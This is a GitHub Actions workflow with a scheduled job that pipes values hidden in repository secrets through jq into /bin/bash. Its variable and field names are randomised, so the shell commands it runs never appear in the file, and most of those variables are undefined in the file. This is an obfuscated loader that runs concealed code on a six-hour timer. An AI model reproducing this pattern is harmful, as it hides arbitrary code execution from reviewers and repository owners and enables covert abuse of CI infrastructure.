name: baochibaozhi

on:
  workflow_dispatch:
  schedule:
    - cron: '32 3/6 * * *'

jobs:  # 15885
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baochibaozhi
        env:
          nxz4878: ${{ secrets.nxz4878 }}
        run: |
          echo $nxz4878 | jq -r .ayji5882 | /bin/bash
          echo $xcapt7 | jq -r .mzxmj6862 | /bin/bash
          echo $zywpb68 | jq -r .bop095 | /bin/bash
          echo $vk13280 | jq -r .f28193 | /bin/bash
          echo $wbgo67770 | jq -r .st23 | /bin/bash
          echo $okwu24 | jq -r .bqb7845 | /bin/bash
          echo $jxc3207 | jq -r .hit8586 | /bin/bash
          echo $g586 | jq -r .duz35 | /bin/bash

